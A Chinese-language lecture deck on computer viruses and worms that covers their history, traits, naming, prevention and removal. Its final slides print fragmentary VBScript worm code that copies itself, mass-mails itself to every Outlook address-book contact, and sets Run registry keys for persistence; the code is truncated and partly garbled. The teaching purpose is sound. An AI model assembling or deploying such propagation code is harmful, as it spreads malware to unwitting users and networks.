计算机病毒技术课件

计算机病毒技术主要内容介绍计算机病毒的历史、病毒的基本特征、病毒的命名、病毒的预防及清除等介绍蠕虫分类、技术特点、基本结构、传播过程、对蠕虫的防范和清除方法等1恶意程序的种类1、陷门（或称后门）2、逻辑炸弹3、特洛伊木马4、病毒5、蠕虫6、细菌7、流氓软件2计算机病毒的历史1983年首次确认计算机病毒，1988年美国研究生莫里斯编写的蠕虫病毒首次造成重大经济损失，引起了人们的广泛重视。我国从上世纪八十年代开始发现计算机病毒，如"黑色星期五"，"米氏病毒"，"小球病毒"等。计算机病毒经历了从dos病毒到windows病毒，再到网络蠕虫的发展过程，计算机病毒的种类层出不穷。伴随着计算机病毒的发展，杀毒软件和防病毒软件也得到了迅速的发展3计算机病毒产生的原因1、恶作剧或表现自己2、经济利益3、个别人的报复心理4、版权保护5、政治目的5计算机病毒的特征传染性判别一个程序是否为计算机病毒的最重要条件隐蔽性病毒一般只有几百或1k字节，附在正常程序内或磁盘上，很难区别病毒程序与正常程序。潜伏性只有在满足其特定条件时才启动其表现（破坏）模块表现性任何病毒只要侵入系统，都会对系统及应用程序产生程度不同的影响。6病毒的传染性计算机病毒的传染性是指病毒具有把自身复制到其它媒体的特性。这些媒体可以是程序、文件或存储介质。病毒传染的种类文件传染：包括传染可执行文件、文档文件、数据文件和web文件等引导扇区传染引导扇区是系统第一次读该磁盘或引导系统时要读取的地方，因此只要访问磁盘就可能传染引导扇区病毒网络传染通过网络直接进入目标主机，而不需要通过染毒文件作为载体，典型代表是蠕虫病毒 文件感染性病毒和引导区病毒都需要具有自我检测的功能，以避免二次感染造成自身的崩溃。7病毒的潜伏性病毒的潜伏性是指病毒具有依附其它媒体而寄生的能力。计算机病毒只有当满足某种触发条件时才会发作，这些触发条件包括三种：利用时间触发：包括系统时间和病毒内自带的计数器利用计算机内执行的特定操作触发外部命令触发9病毒的表现性病毒的表现性是指当病毒被触发时，病毒在染毒计算机上发作所表现出的症状和破坏性。病毒的表现性包括： 1、有益的服务 2、占用CPU资源 3、干扰系统运行 4、干扰键盘、喇叭或屏幕 5、干扰打印机 6、攻击CMOS，攻击硬件 7、攻击系统数据区 8、攻击文件 9、攻击内存 10、窃取机密信息 11、窃取核心控制权 12、破坏网络系统10病毒的分类引导型病毒文件型病毒宏病毒蠕虫病毒木马病毒脚本病毒多态性病毒11计算机病毒的一般组成安装模块传染模块破坏模块13计算机病毒制作技术采用自加密技术采用变形技术采用特殊的隐形技术对抗计算机病毒防范系统反跟踪技术利用中断处理机制14宏病毒宏病毒是使用宏语言编写的程序，可以在一些数据处理系统中运行，存在于字处理文档、数据表格、数据库、演示文档等数据文件中，利用宏语言的功能将自己复制并且繁殖到其它数据文档中15宏的种类与编写在word等办公软件中有许多“内建宏”，当用户进行打开文件、新建文件、保存文件、打印文件和关闭文件等操作时，会调用这些宏，例如打开文件之前调用、打印文件之前调用等，还有一些会自动调用的全局宏，如AutoOpen、AutoClose、AutoNew等编写宏的操作如下按Alt_F11打开宏编辑窗口，右键单击“Normal”，选择“插入-模块”，然后输入代码并保存17宏病毒如何传播宏包括两种：每个文档中间包含的宏，如为所有打开的文档共用的宏，如AutoOpen宏病毒一般首先隐藏在一个指定的Word文件中，一旦运行该文件，宏病毒即被运行。宏病毒首先将自身拷贝到全局宏的区域，使得所有打开的文件都会使用该宏。当Word退出时，全局宏将被存放在某个全局的模板文件中。当Word再次运行时会自动装入病毒并执行。18如何发现宏病毒选择菜单：“工具”->“宏”->“宏”或直接按Alt+F11，如果发现有很多以“Auto”开始的宏，那么很可能被宏病毒感染了19脚本病毒脚本病毒是使用脚本语言编写的计算机病毒，其编写方法比用其它语言简单，且具有传播快、破坏力大的特点典型案例“爱虫”病毒、“新欢乐时光”病毒21WSH简介WSH概念是WindowsScriptingHost的缩写，即Windows脚本宿主WSH最早出现于Windows98系统，可以解释执行脚本语言WSH默认脚本宿主可以设为wscript.exe或cscript.exe22VBS脚本病毒的特点编写简单破坏力大传染力强传播范围大病毒源码容易被获取，变种多欺骗性强使得病毒生产机实现起来非常容易23VBS脚本病毒的预防和解除禁用文件系统对象用regsvr32scrrun.dll/u命令可以禁止文件系统对象，或直接查找scrrun.dll文件删除或改名卸载WindowsScriptingHost进入“控制面板”中的“添加/删除程序”卸载该组件删除VBS、VBE、JS、JSE文件后缀名与应用程序的关联进入“我的电脑”->“察看”->“文件夹选项”->“文件类型”，然后删除这些文件后缀名与应用程序的关联在Windows目录中，找到Wscript.exe并删除或改名25VBS脚本病毒的预防和解除自定义安全级别，将“Internet选项”中设置禁用ActiveX控件及插件禁止OutlookExpress的自动收发邮件功能设置显示文件扩展名将系统的网络连接的安全级别设置至少为“中等”杀毒软件26病毒的命名一系统病毒系统病毒的前缀是Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的*.exe和*.dll文件，并通过这些文件进行传播。如CIH病毒。蠕虫病毒蠕虫病毒的前缀是Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播，很大部分的蠕虫病毒都有向外发送带毒邮件，阻塞网络的特性。比如冲击波（阻塞网络），小邮差（发带毒邮件）等。29病毒的命名二木马病毒、黑客病毒木马病毒的前缀是Trojan，黑客病毒前缀是Hack。木马病毒通常是通过网络或者系统漏洞进入用户的系统并隐藏，然后向外界泄露用户的信息，而黑客病毒则有一个可视的界面，能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的。脚本病毒病毒的前缀是Script。脚本病毒的公有特性是使用脚本语言编写，通过网页进行的传播的病毒。脚本病毒还会有如下前缀：VBS、JS（表明是何种脚本编写的）。如欢乐时光（VBS.Happytime）、十四日（Js.Fortnight.c.s）等。宏病毒宏病毒的前缀是Macro，第二前缀是：Word、Word97、Excel、Excel97等其中之一。如：著名的美丽莎(Macro.Melissa)。30病毒的命名三后门病毒后门病毒的前缀是Backdoor。该类病毒的公有特性是通过网络传播，给系统开后门，给用户电脑带来安全隐患。如后门Backdoor.IRCBot。病毒种植程序病毒病毒的前缀是Drooper，这类病毒公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下，由释放出来的新病毒产生破坏。如：冰河播种者（Dropper.BingHe2.2C）、MSN射手(Dropper.Worm.Smibag)等。破坏性程序病毒破坏性程序病毒的前缀是Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒便会直接对用户计算机产生破坏。如：格式化C盘（Harm.formatC.f）、杀手命令（Harm.Command.Killer）等。31病毒的命名四玩笑病毒玩笑病毒的前缀是Joke，也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击，当用户点击这类病毒时，病毒会做出各种破坏操作来吓唬用户，其实病毒并没有对用户电脑进行任何破坏。如：女鬼（Joke.Girlghost）病毒。捆绑机病毒捆绑机病毒的前缀是：Binder。这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来，表面上看是一个正常的文件，当用户运行这些捆绑病毒时，会表面上运行这些应用程序，然后隐藏运行捆绑在一起的病毒，从而给用户造成危害。如：捆绑QQ（Binder.QQPass.QQBin）、系统杀手（Binder.killsys）等。32计算机病毒的预防1、安装防病毒产品并及时更新最新的病毒特征库2、安装防火墙3、补齐系统漏洞及应用程序漏洞4、不打开来历不明的邮件中的附件5、对外来的软盘、光盘和其它存储介质，及对电子邮件和互联网文件进行病毒检查。6、尽量不从不可靠的渠道下载软件7、不访问恶意网页8、善于从异常情况中发现病毒并予以清除33计算机病毒的清除由于病毒通常会把自身嵌入或替换染毒文件，因此我们一方面要养成定期数据备份的好习惯，另外在杀病毒前也要将染毒文件做好备份，以免在杀病毒的同时破坏了原有文件，给自己造成损失。使用杀毒软件进行杀毒，杀毒软件必须先查杀内存中的病毒，再杀磁盘中的病毒，否则需要用干净的引导盘启动后再用杀毒软件杀毒。杀毒软件的病毒特征库必须是最新的，并且最好能用两种以上的杀毒软件进行杀毒，降低某种杀毒软件可能存在的缺陷而漏过某些病毒。34蠕虫病毒蠕虫病毒是指通过复制自身，并将副本通过网络传到其他计算机上的程序。蠕虫病毒具有病毒的一些共性，如传染性、隐蔽性、潜伏性、破坏性等。在产生的破坏性上，蠕虫病毒也不是普通病毒所能比拟的，网络的发展使得蠕虫可以在短时间内蔓延整个网络，造成网络瘫痪。35蠕虫所造成的破坏病毒名称

持续时间

造成损失

莫里斯蠕虫

1988年

6000多台计算机停机，直接经济损失达9600万美元!

美丽杀手

1999年

政府部门和一些大公司紧急关闭了网络服务器，经济损失超过12亿美元!

爱虫病毒

2000年5月至今

众多用户电脑被感染，损失超过100亿美元以上

红色代码

2001年7月

网络瘫痪，直接经济损失超过26亿美元

求职信

2001年12月至今

大量病毒邮件堵塞服务器，损失达数百亿美元

Sql蠕虫王

2003年1月

网络大面积瘫痪，银行自动提款机运做中断，直接经济损失超过26亿美元

36蠕虫与一般病毒的异同一般的病毒是需要寄生的，它可以通过自己指令的执行，将自己的指令代码写到其他程序的体内，而被感染的文件就被称为”宿主”。蠕虫一般不采取插入文件的方法，而是复制自身在互联网环境下进行传播。一般病毒的传染能力主要是针对计算机内的文件系统而言，而蠕虫的传染目标是互联网内的所有计算机。局域网条件下的共享文件夹，电子邮件email，网络中的恶意网页，大量存在着漏洞的服务器等都成为蠕虫传播的良好途径。37蠕虫的技术特点利用操作系统和应用程序的漏洞主动进行攻击此类病毒主要有“红色代码”、“尼姆达”、”求职信”等。“尼姆达”病毒和“红色代码”病毒是利用了微软IIS服务器软件的漏洞，“Sql蠕虫王”病毒则是利用了SQLServer2000的一个漏洞。传播方式多样如“尼姆达”病毒和”求职信”病毒，可利用的传播途径包括文件、邮件附件、Web服务器、网络共享等。38蠕虫的技术特点病毒制作技术与传统的病毒不同蠕虫病毒可以采用脚本语言编写，制作相对简单。与黑客技术相结合!潜在的威胁和损失更大。以红色代码为例，感染后的机器的web目录的\scripts下将生成一个root.exe，可以远程执行任何命令，从而使黑客能够再次进入!39蠕虫的基本结构蠕虫的基本程序结构为：传播模块负责蠕虫的传播。隐藏模块侵入主机后，隐藏蠕虫程序，防止被用户发现。目的功能模块实现对计算机的控制、监视或破坏等功能。蠕虫的传播技术是蠕虫技术的首要技术，传播模块实现的实际上是自动入侵的功能。没有蠕虫的传播技术，也就谈不上什么蠕虫技术了40蠕虫的传播过程传播模块分为：扫描模块、攻击模块和复制模块。蠕虫程序的一般传播过程为：1.扫描：由蠕虫的扫描功能模块负责探测存在漏洞的主机。当程序向某个主机发送探测漏洞的信息并收到成功的反馈信息后，就得到一个可传播的对象。 2.攻击：攻击模块按漏洞攻击步骤自动攻击步骤1中找到的对象，取得该主机的权限（一般为管理员权限），获得一个shell。3.复制：复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动。41蠕虫所造成的威胁蠕虫所造成的主要威胁包括：占用了大量网络带宽，造成网络拥塞，网络性能急剧下降。消耗系统资源，导致系统的性能下降。有些蠕虫还会在染毒机器上留有后门，威胁计算机的安全。蠕虫的扫描策略随机选取某一段IP地址，然后对这一地址段上的主机扫描。有些扫描程序会不断重复上面这一过程。这样，随着蠕虫的传播，新感染的主机也开始进行这种扫描，这些扫描程序不知道那些地址已经被扫描过，它只是简单的随机扫描互联网。于是蠕虫传播的越广，网络上的扫描包就越多。蠕虫传播的其它方式例如利用邮件地址薄获得邮件地址，群发带有蠕虫程序的邮件，用户收到邮件后邮件被动打开，蠕虫程序启动42企业用户对蠕虫病毒的防范措施加强网络管理员安全管理水平，提高安全意识建立病毒检测系统建立应急响应系统建立灾难备份系统对于局域网而言，可以采用以下一些主要手段：在因特网接入口处安装防杀计算机病毒产品，将病毒隔离在局域网之外。对邮件服务器进行监控，防止带毒邮件进行传播。对局域网用户进行安全培训。43个人用户对蠕虫病毒的防范措施安装合适的杀毒软件经常升级病毒库提高防杀毒意识，不要轻易去点击陌生的站点不随意查看陌生邮件，尤其是带有附件的邮件44如何预防和清除蠕虫补齐系统和应用软件的补丁程序安装防病毒软件利用蠕虫专杀工具手工清除蠕虫注意:根据蠕虫利用网络传播的特点，因此在杀蠕虫时需要切断染毒机器与网络的连接，否则在杀蠕虫的同时又会不断地重新感染。45如何手工清除蠕虫在蠕虫专杀工具尚未公布之前，需要通过手工清除蠕虫，手工清除掌握四要素：漏洞、内存、注册表、文件。清除步骤如下：1、给系统漏洞打补丁2、清除内存中的病毒进程3、删除注册表中的病毒项 为了每次开机自动启动，蠕虫会修改注册表中的启动项，具体位置是HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run4、删除病毒文件。 如果该文件不能删除，则进入安全模式或者用A盘直接启动到DOS模式下进行删除。46云安全技术“云安全”技术是网络时代信息安全的最新体现，它融合了并行处理、网格计算、未知病毒行为判断等新兴技术和概念，通过网状的大量客户端对网络中软件行为的异常监测，获取互联网中木马、恶意程序的最新信息，发送到服务端进行自动分析和处理，然后再把病毒和木马的解决方案分发到每一个客户端。云安全技术应用后，识别和查杀病毒不再仅仅依靠本地硬盘中的病毒库，而是依靠庞大的网络服务，实时进行采集、分析以及处理。整个互联网就是一个巨大的“杀毒软件”，参与者越多，每个参与者就越安全，整个互联网就会更安全。以金山毒霸为例，“依托于云安全技术，金山毒霸2009病毒库病毒样本数量增加了5倍、日最大病毒处理能力提高了100倍、紧急病毒响应时间缩短到1小时以内。”可以说云安全开创了计算机安全2.0时代。47蠕虫病毒自我复制的部分代码'创建一个文件对象SetobjFs=CreateObject("Scripting.")'通过文件系统对象的方法创建一个TXT方法objFs.CreateTextFile"c:\virus.txt",1将上述代码保存为.vbs的VB脚本文件，执行后将在C盘中创建一个TXT文件。 执行代码如将第二条语句改为：objFs.Get).Copy(“c:\virus.vbs”)就可以实现将自身复制到C盘virus.bat文件

执行代码48蠕虫病毒传播的部分代码'创建一个OUTLOOK应用的对象SetobjOA=Wscript.CreateObject("Outlook.Application")'取得MAPI名字空间SetobjMapi=objOA.GetNameSpace("MAPI")'遍历地址簿Fori=1toobjMapi.AddressLists.Count SetobjAddList=objMapi.AddressLists(i) Forj=1ToobjAddList.AddressEntries.Count SetobjMail=objOA.CreateItem(0) '取得收件人邮件地址

objMail.Recipients.Add(objAddList.AddressEntries(j)) '设置邮件主题,这个往往具有很大的诱惑性质

objMail.Subject="你好!"49蠕虫病毒传播的部分代码 '设置信件内容 objMail.Body="这次给你的附件,是我的新文档！" '把自己作为附件扩散出去

objMail.Attachments.Add("c:\virus.vbs") '发送邮件

objMail.Sen

NextNext'清空objMapi变量,释放资源SetobjMapi=Nothing'清空objOA变量setobjOA=Nothing50蠕虫病毒潜伏的部分代码'容错语句，避免程序崩溃OnErrorResumeNextdimwscr,rr'创建WScript.Shell对象setwscr=CreateObject("WScript.Shell")'读入注册表中的超时键值rr=wscr.Regread("HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptHost\Settings\Timeout")if(rr>=1)then '超时设置 wscr.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptHost\Settings\Timeout",0,"REG_DWORD"endif

执行代码51蠕虫病毒潜伏的部分代码以下代码是修改注册表，使得每次系统启动时自动执行脚本文件RegCreate"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"RegCreate"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",di